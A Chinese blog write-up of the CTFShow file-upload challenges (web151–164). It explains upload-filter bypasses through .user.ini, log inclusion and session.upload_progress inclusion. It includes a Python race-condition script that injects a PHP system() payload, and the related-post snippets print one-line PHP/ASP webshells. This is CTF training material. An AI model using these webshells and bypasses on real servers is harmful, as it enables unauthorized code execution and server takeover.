CTFShow文件上传

最新推荐文章于 2024-08-27 02:27:00 发布
原创 最新推荐文章于 2024-08-27 02:27:00 发布 · 533 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

CTFShow文件上传

web151

前端直接抓包改就行
在这里插入图片描述

web152

同上

web153(.user.ini)

利用上传.user.ini进行文件上传绕过

php.ini是php的一个全局配置文件,对整个web服务起作用;
而.user.ini和.htaccess一样是目录的配置文件,.user.ini就是用户自定义的一个php.ini,
通常用这个文件来构造后门和隐藏后门。
**利用.user.ini,要求目标目录下必须包含php文件**
.user.ini的内容为auto_append_file=1.png,意思就是使1.png包含在目标目录的php文件中,然后再上传一句话木马(1.png)

回到题目
先上传图片马,在上传.user.ini去包含这张图片
在这里插入图片描述
在这里插入图片描述
然后去访问/upload/index.php,图片马就会被写到php文件中
在这里插入图片描述

web154

这里被过滤了php字符串,可以用短标签
同上
在这里插入图片描述

web155

同上

web156

过滤了[] , php里可以用 {} 来代替
同上
在这里插入图片描述

web157

过滤了分号,但我们知道php的最后语句是可以不需要分号的
同上
在这里插入图片描述

web158

同上

web159

这次是过滤了括号,可以用反引号代替system()
同上
在这里插入图片描述

web160

这次过滤的有点多,php、[、{、 ;、 (、 反引号 、空格都没了
可以试试日志包含,但这里log被过滤了,要注意一下
同上
成功日志包含就可以在UA头里带上一句话了
在这里插入图片描述

web161

同上

web162

这里其实是过滤了点,不能日志包含还可以session包含
利用session.upload_progress进行文件包含和反序列化渗透
在这里插入图片描述
在这里插入图片描述
然后还需要进行条件竞争,

import requests
import threading

session = requests.session()
sess = 'paidx0'
url1 = "http://2c7c01f5-6207-457e-b332-c72b453b765f.challenge.ctf.show:8080/"
url2 = "http://2c7c01f5-6207-457e-b332-c72b453b765f.challenge.ctf.show:8080/upload/"
data1 = {
   
   
    'PHP_SESSION_UPLOAD_PROGRESS': '<?php system("tac ../f*");?>'
}
file = {
   
   
    'file': 'paidx0'
}
cookies = {
   
   
    'PHPSESSID': sess
}

def write():
    while True:
        r = session.post(url1, data=data1, files=file, cookies=cookies)

def read():
    while True:
        r = session.get(url2)
        if 'flag' in r.text:
            print(r.text)
        else:
            print('--------')


threads = [threading.Thread(target=write),
           threading.Thread(target=read)]
for t in threads:
    t.start()

web163

同上

web164(png二次渲染)

会发现只能上传png,而且文件名也被修改
后端二次渲染会把上传到服务器的图片的代码改变
利用 imagecreatefrompng()。png和jpg要利用脚本生成图片马,gif文件只需要将图片下载回来对照,shell写入未改动的区域
参考链接

<?php
$p = array(0xa3, 0x9f, 0x67, 0xf7, 0x0e, 0x93, 0x1b, 0x23,
           0xbe, 0x2c, 0x8a, 0xd0, 0x80, 0xf9, 0xe1, 0xae,
           0x22, 0xf6, 0xd9, 0x43, 0x5d, 0xfb, 0xae, 0xcc,
           0x5a, 0x01, 0xdc, 0x5a, 0x01, 0xdc, 0xa3, 0x9f,
           0x67, 0xa5, 0xbe, 0x5f, 0x76, 0x74, 0x5a, 0x4c,
           0xa1, 0x3f, 0x7a, 0xbf, 0x30, 0x6b, 0x88, 0x2d,
           0x60
最低0.47元/天 解锁文章
ctfshow文件上传
weixin_53955759的博客
04-15 915
web151 前台校验不可靠,前端验证 上传png,抓包改文件名为.php 成功,蚁剑连接得到falg web152 更改Content-Type即可 蚁剑连接,得到flag web153 利用上传user.ini进行文件上传绕过。 自 PHP 5.3.0 起,PHP 支持基于每个目录的 INI 文件配置。此类文件 仅被 CGI/FastCGI SAPI 处理。此功能使得 PECL 的 htscanner 扩展作废。如果你的 PHP 以模块化运行在 Apache 里,则用 .htaccess 文件有同样
ctfshow——文件上传
qq_55202378的博客
12-27 1911
之外,php还会在每个目录下扫描INI文件,从被执行的PHP文件所在目录开始一直上升到web根目录($_SERVER[‘DOCUMENT_ROOT’]所指定)。的组件库,url代表上传接口,accept代表允许上传的文件类型,exts代表允许上传的文件后缀。风格的 INI 文件中只有具有 PHP_INI_PERDIR 和 PHP_INI_USER 和PHP_INI_ALL模式的 INI 设置可被识别。,上传一个png的webshell,再使用burp抓包更改文件后缀名,再访问上传的webshell。
[CTFSHOW]文件上传
Huamang的博客
03-28 381
web 151 看源码是js判断文件类型进行拦截,先上传一个图片,再抓包改成php文件后缀就可以了,当然内容也删掉,留下php代码 web 152 和上题一样的解法 web 153 和上面一样的解法直接改后缀就没用了 测试了一下,发现是黑名单的过滤 所以就上传.htaccess文件把png文件解析成php 但是很遗憾,用不了 引用一波羽大佬的wp: 本题考点为.user.ini,详细配置可以参考官方文档 如果你目录下有user.ini会先去识别里面的配置,但是只有 PHP_INI_PERDIR 和
ctfshow 文件上传
qq_52671379的博客
04-06 492
ctfshow 文件上传
CTFSHOW 文件上传
qq_51754713的博客
02-27 508
开启文件上传 先补充一些知识 1.一句话木马 <?php @eval($_POST['attack']) ?> 只要一句话脚本上传到了服务器当中,我们就可以使用中国蚁剑或者中国菜刀链接并控制整个服务器。 2.中国蚁剑的使用 此处添加的url为我们一句话脚本所在的url,连接密码就是我们定义的_POST中的变量,如上面就是attack。 web152 解题思路:上传我们做好的含有一句话木马的图片,然后抓包修改发送包的类型为php,用蚁剑连接。 知识点: ①一句话木马的制作:我们使用Notepa
CTFSHOW 文件上传
m0_64180167的博客
11-14 508
直接上传 png的图片马然后抓包修改为php
CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp
最新发布
2401_86043950的博客
08-27 927
【代码】CTFShow-WEB入门篇文件上传详细Wp(151-170)_ctfshow文件上传wp。
CTFSHOW 文件上传 151-170
Landasika的博客
05-17 752
预备知识 1、一句话木马: php:<?php @eval($_post['pass']);?> asp:<%eval request ("pass")%> aspx:<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%> phtml:GIF89a? ...
ctfshow 文件上传161-167
qq_52671379的博客
04-08 2127
ctfshow 文件上传161-167
CTFSHOW文件上传(可能也是持续更新)
Npceer-一位网安初学者的博客
02-14 338
文件上传0x01 web 151 0x01 web 151 按照hint去试了下 写一句话 然后改png 上传 抓包把后缀改成php 然后就上传成功了 然后 我太菜了 不会玩 还想用菜刀呢 然后报错了 没仔细看原因 接着访问url/upload/**.php(你自己写进去的文件名字) 我用的hackbar 从羽大佬博客学了一下 因为我自己用system+cat不知道为啥半天弄不出 ...
CTFshow-文件上传
qq_61376069的博客
01-22 695
CTFshow入门——文件上传
CTFSHOW-文件上传
Yb_140的博客
05-28 630
前端验证将这里改为php即可上传后缀为php一句话木马访问upload/1.php
CTFshow_文件上传
qq_45927819的博客
11-29 3281
文章目录web151web152web153 web151 上传图片,经过测试只能上传后缀为png的图片 抓包改数据: 使用蚁剑连接: 找到flag! web152 做法和上题一样! web153 继续之前的操作,但并没有上传成功:
ctfshow---文件上传
fainpo的博客
04-10 811
来到文件上传了。
CTFshow | 文件上传
m0_60651303的博客
08-04 1038
var/log/nginx/ 目录是 NGINX 的默认日志位置,可以从中找到一个 access.log 文件和 error.log 文件,include函数包含日志查看日志内容。2、看一下upload文件下有index.php,说明可以通过.user.ini文件来上传。文件上传漏洞是指用户上传了一个可执行的脚本文件,而且通过这个脚本文件获得了执行服务端命令的能力。1、几经尝试,发现php不能通过,phP可以通过,说明过滤掉了php。过滤了php,system,{},和分号,直接执行命令。
ctfshow -web文件上传
m0_72898152的博客
02-02 1680
ctf
CTFSHOW文件上传
羽的博客
11-19 9801
151 绕过前端验证 方法1:直接关闭浏览器的js 方法2:上传.png(没错,只能是png,gif和jpg都不行)文件然后bp抓包后修改后缀 152
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

paidx0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值